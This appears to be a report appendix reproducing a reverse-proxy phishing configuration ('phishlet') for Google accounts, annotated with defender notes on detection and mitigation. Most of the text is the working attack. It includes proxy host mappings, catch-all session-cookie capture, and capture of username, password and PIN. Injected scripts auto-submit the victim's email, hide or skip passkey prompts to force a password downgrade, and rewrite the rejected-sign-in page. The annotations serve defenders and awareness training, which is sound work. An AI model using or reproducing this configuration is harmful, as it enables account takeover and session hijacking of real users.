Appendix 1: Google Auth Phishlet
# Reverse-proxy phishlet configuration targeting the Google sign-in flow.
# The tool that consumes these keys is not shown on this page, so field
# semantics below are stated only as far as the values themselves show them.
# NOTE(review): the trailing "| |" on each line is table residue from the page
# rendering and the original YAML indentation has been lost; this listing is
# not loadable as-is.
min_ver: '3.0.0' | |
# [ORIGIN_DOMAIN] is an unfilled placeholder left by the author.
redirect_url: 'https://www.[ORIGIN_DOMAIN].com/' | |
# Each entry pairs a legitimate host (orig_sub + domain) with a subdomain
# (phish_sub) served under the proxy's own domain. The hostname the user sees
# is therefore never Google-owned: origin-bound controls (password-manager
# autofill, WebAuthn/passkeys) and hostname-based mail/web filtering all key on
# that mismatch. Only the first entry is marked session: true / is_landing: true,
# and it is the one entry whose phish_sub ('training') differs from orig_sub.
proxy_hosts: | |
- {phish_sub: 'training', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true} | |
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.ru', session: false, is_landing: false} | |
- {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'chat', orig_sub: 'chat', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'lh3', orig_sub: 'lh3', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'www', orig_sub: 'www', domain: 'gstatic.com', session: false, is_landing: false} | |
- {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false} | |
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false} | |
- {phish_sub: 'signaler-pa', orig_sub: 'signaler-pa', domain: 'googleapis.com', session: false, is_landing: false} | |
- {phish_sub: 'ajax', orig_sub: 'ajax', domain: 'googleapis.com', session: false, is_landing: false} | |
# Both domains use a catch-all regexp key, so every cookie set for them is in
# scope rather than a named few. Incident-response implication: treat all
# session cookies of an affected account as exposed and revoke active sessions,
# not only rotate the password.
auth_tokens: | |
- domain: '.google.com' | |
keys: [".*,regexp"] | |
- domain: 'accounts.google.com' | |
keys: [".*,regexp"] | |
# POST fields matched by name: 'identifier', 'Passwd' and a custom 'Pin'.
# The '(.*)' pattern takes each field's whole value.
credentials: | |
username: | |
key: 'identifier' | |
search: '(.*)' | |
type: 'post' | |
password: | |
key: 'Passwd' | |
search: '(.*)' | |
type: 'post' | |
custom: | |
- key: 'Pin' | |
search: '(.*)' | |
type: 'post' | |
# NOTE(review): presumably a request to one of these paths is what marks the
# proxied session as authenticated — confirm against the tool's documentation.
auth_urls: | |
- '/CheckCookie' | |
- '/RotateCookies' | |
# Entry path of the proxied sign-in flow (flowName=WebLiteSignIn).
login: | |
domain: 'google.com' | |
path: '/v3/signin/identifier?flowName=WebLiteSignIn' | |
# Scripts injected into proxied pages, selected by domain and path.
# First entry: runs on the identifier page only when an 'email' parameter is
# present. It hides the page body, writes the {email} placeholder into
# #identifierId and clicks #identifierNext after 3000 ms; if the field is not
# found the body is shown again.
# NOTE(review): {email} is presumably substituted by the proxy from the link the
# user followed — confirm. A sign-in page that arrives with the account name
# already filled in and advances without user input is a cue worth covering in
# user awareness material.
js_inject: | |
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/identifier"] | |
trigger_params: ["email"] | |
script: | | |
document.body.style.display = 'none'; | |
function lp(){ | |
document.querySelector('#identifierNext').click(); | |
} | |
var email = document.querySelector('#identifierId'); | |
if (email != null) { | |
email.value = '{email}'; | |
setTimeout(function(){lp();}, 3000); | |
} else { | |
document.body.style.display = ''; | |
} | |
# Password-challenge page: locates the <p> whose text mentions the passkey
# alternative (English or Russian UI string), hides the element three parents
# up, and blanks the label of any 'Try another way' button before re-showing
# the body. Matching is by exact UI text, so it only applies to those two
# locales as written.
# Defender note: the visible effect is that the passkey prompt disappears and
# the password field is the only path offered. Passkeys and security keys are
# origin-bound and would not validate on the proxy hostname; accounts that still
# permit password fallback are the ones exposed, so enforcing phishing-resistant
# methods without fallback removes this path.
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/challenge/pwd"] | |
script: | | |
document.body.style.display = 'none'; | |
var paragraphs = Array.from(document.querySelectorAll('p')); | |
var targetParagraph = paragraphs.find(p => | |
p.textContent.includes('Select "Try another way" to use') || | |
p.textContent.includes('Чтобы использовать ключ доступа') | |
); | |
if (targetParagraph) { | |
var targetSection = targetParagraph.parentElement.parentElement.parentElement; | |
if (targetSection) { | |
targetSection.hidden = true; | |
} | |
} | |
var buttons = document.querySelectorAll('button'); | |
buttons.forEach(button => { | |
if (button.textContent.trim() === 'Try another way' || button.textContent.trim() === 'Другой способ') { | |
button.textContent = ''; | |
} | |
}); | |
document.body.style.display = ''; | |
# Passkey challenge page (path .../challenge/pk/presend): hides the body and
# programmatically clicks any button labelled 'Try another way' (English or
# Russian), so the user is moved off the passkey prompt without interacting
# with it. The body is not re-shown by this script.
# Defender note: server-side, this appears as a passkey challenge that is
# abandoned in favour of another method; NOTE(review): whether sign-in logs
# expose that sequence for alerting should be confirmed for the tenant.
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/challenge/pk/presend"] | |
script: | | |
document.body.style.display = 'none'; | |
var buttons = document.querySelectorAll('button'); | |
buttons.forEach(button => { | |
if (button.textContent.trim() === 'Try another way' || button.textContent.trim() === 'Другой способ') { | |
button.click(); | |
} | |
}); | |
# Challenge-selection page: for every <span>, clicks the grandparent of the
# 'Enter your password' option and hides the element four parents above the
# 'Use your passkey' option (English or Russian labels), then re-shows the body.
# The console.log(span) call is a debugging leftover and writes the matched
# element to the browser console.
# Defender note: same downgrade as on the password page — the phishing-resistant
# option is removed from the choices shown, leaving the password method.
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/challenge/selection"] | |
script: | | |
document.body.style.display = 'none'; | |
var spans = document.querySelectorAll('span'); | |
spans.forEach(span => { | |
if (span.textContent.trim() === 'Enter your password' || span.textContent.trim() === 'Введите пароль') { | |
document.body.style.display = 'none'; | |
span.parentElement.parentElement.click(); | |
} | |
if (span.textContent.trim() === 'Use your passkey' || span.textContent.trim() === 'Использовать ключ доступа') { | |
console.log(span); | |
span.parentElement.parentElement.parentElement.parentElement.hidden = true; | |
} | |
}); | |
document.body.style.display = ''; | |
# Sign-in rejected page: replaces the 'Contact your domain admin for help'
# paragraph (English and Russian variants handled separately) with fixed HTML
# containing a password-change link on myaccount.google.com and a mailto link
# to administrator@[ORIGIN_DOMAIN].org (unfilled placeholder). The innerHTML
# values are constant string literals; no page-derived data is interpolated.
# NOTE(review): 'myaccount' is listed in proxy_hosts, so the password-change
# link is presumably rewritten to the proxy hostname as well — confirm.
# Defender note: a rejected sign-in followed shortly by a password change for
# the same account from an unfamiliar address is a sequence worth correlating
# in sign-in and account-activity logs.
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/rejected"] | |
script: | | |
document.body.style.display = 'none'; | |
var paragraphs = Array.from(document.querySelectorAll('p')); | |
var targetParagraph1 = paragraphs.find(p => | |
p.textContent.includes('Contact your domain admin for help') | |
); | |
if (targetParagraph1) { | |
targetParagraph1.innerHTML = 'Use this link to change your password: <a href="https://myaccount.google.com/u/1/signinoptions/password">Change Password</a><br>or contact your domain admin for help: <a href="mailto:administrator@[ORIGIN_DOMAIN].org">Send Email</a>'; | |
} | |
var targetParagraph2 = paragraphs.find(p => | |
p.textContent.includes('Обратитесь за помощью к администратору домена') | |
); | |
if (targetParagraph2) { | |
targetParagraph2.innerHTML = 'Используйте эту ссылку для восстановления пароля: <a href="https://myaccount.google.com/u/1/signinoptions/password">Изменить пароль</a><br>или обратитесь за помощью к администратору домена: <a href="mailto:administrator@[ORIGIN_DOMAIN].org">Написать письмо</a>'; | |
} | |
document.body.style.display = ''; |